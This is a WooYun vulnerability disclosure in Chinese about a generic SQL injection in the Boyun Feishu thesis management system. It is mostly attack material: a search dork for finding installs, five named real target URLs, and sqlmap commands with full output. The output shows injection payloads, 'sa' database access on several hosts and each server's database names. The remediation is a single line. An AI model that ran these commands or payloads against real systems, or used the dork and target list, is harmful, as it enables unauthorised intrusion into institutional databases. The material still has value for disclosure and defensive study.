漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-091826
漏洞标题:博云非书论文管理系统存在通用型SQL注入
相关厂商:杭州麦达电子有限公司
漏洞作者: 路人甲
提交时间:2015-01-19 11:17
修复时间:2015-04-20 14:22
公开时间:2015-04-20 14:22
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:18
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-01-19: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-04-20: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
论文管理系统存在通用型SQL注入
详细说明:
注入点:dbid和docid
搜索关键字:inurl:/docinfo.action?dbid=
http://202.195.136.150/docinfo.action?dbid=72&docid=40824
http://202.199.163.37/docinfo.action?dbid=72&docid=40619
http://paper.buaalib.com/docinfo.action?dbid=72&docid=5793
http://202.121.96.135:8086/docinfo.action?dbid=72&docid=13927
http://219.244.185.22:8080/docinfo.action?dbid=72&docid=62517
1)http://202.195.136.150/docinfo.action?dbid=72&docid=40824
sqlmap.py -u "http://202.195.136.150/docinfo.action?dbid=72&docid=40824" -p "dbid" --dbs --current-user --current-db
sqlmap identified the following injection points with a total of 61 HTTP(s) requ
ests:
---
Place: GET
Parameter: dbid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: dbid=72 AND 9888=9888&docid=40824
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: dbid=72; WAITFOR DELAY '0:0:5';--&docid=40824
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: dbid=72 WAITFOR DELAY '0:0:5'--&docid=40824
---
[17:25:15] [INFO] testing MySQL
[17:25:32] [WARNING] the back-end DBMS is not MySQL
[17:25:32] [INFO] testing Oracle
[17:25:49] [WARNING] the back-end DBMS is not Oracle
[17:25:49] [INFO] testing PostgreSQL
[17:26:06] [WARNING] the back-end DBMS is not PostgreSQL
[17:26:06] [INFO] testing Microsoft SQL Server
[17:26:23] [INFO] confirming Microsoft SQL Server
[17:27:15] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2008
[17:27:15] [INFO] fetching current user
[17:27:15] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[17:27:15] [INFO] retrieved:
[17:29:12] [INFO] retrieved:
[17:29:12] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based queries
sa
current user: 'sa'
[17:36:12] [INFO] fetching current database
[17:36:12] [INFO] retrieved:
[17:38:10] [INFO] retrieved: etd4
current database: 'etd4'
[17:50:28] [INFO] fetching database names
[17:50:28] [INFO] fetching number of databases
[17:50:28] [INFO] retrieved:
[17:51:19] [INFO] retrieved: 7
[17:53:44] [INFO] retrieved:
[17:55:41] [INFO] retrieved: etd4
[18:07:59] [INFO] retrieved:
[18:09:57] [INFO] retrieved: etd4new
[18:30:04] [INFO] retrieved:
[18:32:01] [INFO] retrieved: idl
[18:41:45] [INFO] retrieved:
[18:43:44] [INFO] retrieved: master
[19:01:04] [INFO] retrieved:
[19:03:01] [INFO] retrieved: model
[19:18:02] [INFO] retrieved:
[19:20:01] [INFO] retrieved: msdb
[19:32:17] [INFO] retrieved:
[19:34:15] [INFO] retrieved: temp
[19:47:23] [ERROR] invalid character detected. retrying..
[19:47:23] [WARNING] increasing time delay to 6 seconds
db
available databases [7]:
[*] etd4
[*] etd4new
[*] idl
[*] master
[*] model
[*] msdb
[*] tempdb
2)http://202.199.163.37/docinfo.action?dbid=72&docid=40619
sqlmap.py -u "http://202.199.163.37/docinfo.action?dbid=72&docid=40619" -p "dbid" --dbs --current-user --current-db
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: dbid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: dbid=72 AND 4908=4908&docid=40619
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: dbid=72; WAITFOR DELAY '0:0:5';--&docid=40619
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: dbid=72 WAITFOR DELAY '0:0:5'--&docid=40619
---
[09:45:41] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2005
[09:45:41] [INFO] fetching current user
[09:45:41] [INFO] resumed: sa
current user: 'sa'
[09:45:41] [INFO] fetching current database
[09:45:41] [INFO] resumed: etd
current database: 'etd'
[09:45:41] [INFO] fetching database names
[09:45:41] [INFO] fetching number of databases
[09:45:41] [INFO] resumed: 5
[09:45:41] [INFO] resumed: etd
[09:45:41] [INFO] resumed: master
[09:45:41] [INFO] resumed: model
[09:45:41] [INFO] resumed: msdb
[09:45:41] [INFO] resumed: tempdb
available databases [5]:
[*] etd
[*] master
[*] model
[*] msdb
[*] tempdb
3)http://paper.buaalib.com/docinfo.action?dbid=72&docid=5793
sqlmap.py -u "http://paper.buaalib.com/docinfo.action?dbid=72&docid=5793" -p "dbid" --dbs --current-user --current-db
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: dbid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: dbid=72 AND 1458=1458&docid=5793
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: dbid=72; WAITFOR DELAY '0:0:5';--&docid=5793
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: dbid=72 WAITFOR DELAY '0:0:5'--&docid=5793
---
[13:58:21] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2005
[13:58:21] [INFO] fetching current user
[13:58:21] [INFO] resumed: sa
current user: 'sa'
[13:58:21] [INFO] fetching current database
[13:58:21] [INFO] resumed: etd
current database: 'etd'
[13:58:21] [INFO] fetching database names
[13:58:21] [INFO] fetching number of databases
[13:58:21] [INFO] resumed: 10
[13:58:21] [INFO] resumed: etd
[13:58:21] [INFO] resumed: lunwen
[13:58:21] [INFO] resumed: master
[13:58:21] [INFO] resumed: model
[13:58:21] [INFO] resumed: msdb
[13:58:21] [INFO] resumed: ReportServer
[13:58:21] [INFO] resumed: ReportServerTempDB
[13:58:21] [INFO] resumed: tempdb
[13:58:21] [INFO] resumed: test
[13:58:21] [INFO] resumed: tsk
available databases [10]:
[*] etd
[*] lunwen
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] test
[*] tsk
4)http://202.121.96.135:8086/docinfo.action?dbid=72&docid=13927
sqlmap.py -u "http://202.121.96.135:8086/docinfo.action?dbid=72&docid=13927" -p "dbid" --dbs --current-user --current-db
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: dbid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: dbid=72 AND 7461=7461&docid=13927
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: dbid=72; WAITFOR DELAY '0:0:5';--&docid=13927
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: dbid=72 WAITFOR DELAY '0:0:5'--&docid=13927
---
[11:41:58] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2008
[11:41:58] [INFO] fetching current user
[11:41:58] [INFO] resumed: etd
current user: 'etd'
[11:41:58] [INFO] fetching current database
[11:41:58] [INFO] resumed: etd4
current database: 'etd4'
[11:41:58] [INFO] fetching database names
[11:41:58] [INFO] fetching number of databases
[11:41:58] [INFO] resumed: 9
[11:41:58] [INFO] resumed: chek
[11:41:58] [INFO] resumed: etd4
[11:41:58] [INFO] resumed: idl30
[11:41:58] [INFO] resumed: master
[11:41:58] [INFO] resumed: model
[11:41:58] [INFO] resumed: msdb
[11:41:58] [INFO] resumed: ReportServer$LIB
[11:41:58] [INFO] resumed: ReportServer$LIBTempDB
[11:41:58] [INFO] resumed: tempdb
available databases [9]:
[*] chek
[*] etd4
[*] idl30
[*] master
[*] model
[*] msdb
[*] ReportServer$LIB
[*] ReportServer$LIBTempDB
[*] tempdb
5)http://219.244.185.22:8080/docinfo.action?dbid=72&docid=62517
sqlmap.py -u "http://219.244.185.22:8080/docinfo.action?dbid=72&docid=62517" -p "dbid" --dbs --current-user --current-db
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: dbid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: dbid=72 AND 1334=1334&docid=62517
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: dbid=72; WAITFOR DELAY '0:0:5';--&docid=62517
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: dbid=72 WAITFOR DELAY '0:0:5'--&docid=62517
---
[13:59:22] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2005
[13:59:22] [INFO] fetching current user
[13:59:22] [INFO] resumed: sa
current user: 'sa'
[13:59:22] [INFO] fetching current database
[13:59:22] [INFO] resumed: etd
current database: 'etd'
[13:59:22] [INFO] fetching database names
[13:59:22] [INFO] fetching number of databases
[13:59:22] [INFO] resumed: 7
[13:59:22] [INFO] resumed: etd
[13:59:22] [INFO] resumed: idl30
[13:59:22] [INFO] resumed: idl30oooo
[13:59:22] [INFO] resumed: master
[13:59:22] [INFO] resumed: model
[13:59:22] [INFO] resumed: msdb
[13:59:22] [INFO] resumed: tempdb
available databases [7]:
[*] etd
[*] idl30
[*] idl30oooo
[*] master
[*] model
[*] msdb
[*] tempdb
漏洞证明:
已证明
修复方案:
过滤特殊字符
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝